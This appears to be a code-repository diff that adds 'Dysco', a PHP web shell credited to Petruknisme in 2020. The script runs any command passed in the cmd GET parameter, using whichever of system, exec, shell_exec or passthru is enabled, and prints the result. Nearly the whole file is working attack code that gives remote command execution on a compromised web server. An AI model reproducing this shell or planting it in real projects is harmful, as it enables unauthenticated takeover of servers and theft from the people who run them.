|
| 1 | +<?php |
| 2 | + |
| 3 | +/* |
| 4 | + * Dysco(Dynamic PHP Shell Command for RCE) |
| 5 | + * Created by Petruknisme @2020 |
| 6 | + |
| 7 | + */ |
| 8 | + |
| 9 | + |
| 10 | +function Dysco($command) |
| 11 | +{ |
| 12 | + $list_function_shell = array("system", "exec", "shell_exec", "passthru", "eval"); |
| 13 | + $f_enabled = array_filter($list_function_shell, 'function_exists'); |
| 14 | + |
| 15 | + echo "Enabled Function:\n<br/>"; |
| 16 | + foreach($f_enabled as $f) |
| 17 | + { |
| 18 | + echo $f." "; |
| 19 | + } |
| 20 | + |
| 21 | + if($f_enabled !== ""){ |
| 22 | + $f = $f_enabled[0]; |
| 23 | + echo "<br/>\nUsing ". $f. " as shell command\n<br/>"; |
| 24 | + |
| 25 | + if($f == "system" || $f == "passthru"){ |
| 26 | + // disable multiple output for system |
| 27 | + ob_start(); |
| 28 | + $output = $f($command, $status); |
| 29 | + ob_clean(); |
| 30 | + } |
| 31 | + else if($f == "exec"){ |
| 32 | + $f($command, $output, $status); |
| 33 | + $output = implode("n", $output); |
| 34 | + } |
| 35 | + else if($f == "shell_exec"){ |
| 36 | + $output = $f($command); |
| 37 | + } |
| 38 | + else{ |
| 39 | + $output = "Command execution not possible. All supported function is disabled."; |
| 40 | + $status = 1; |
| 41 | + } |
| 42 | + |
| 43 | + } |
| 44 | + |
| 45 | + return array('output' => $output , 'status' => $status); |
| 46 | +} |
| 47 | + |
| 48 | +// for HTTP GET use this. |
| 49 | + |
| 50 | +if(isset($_GET['cmd'])){ |
| 51 | + $o = Dysco($_GET['cmd']); |
| 52 | + echo $o['output']; |
| 53 | +} |
| 54 | + |
| 55 | +// for debugging in local, use this |
| 56 | + |
| 57 | +//$o = shell_spawn('uname -a'); |
| 58 | +//echo $o['output']; |
| 59 | +?> |
0 commit comments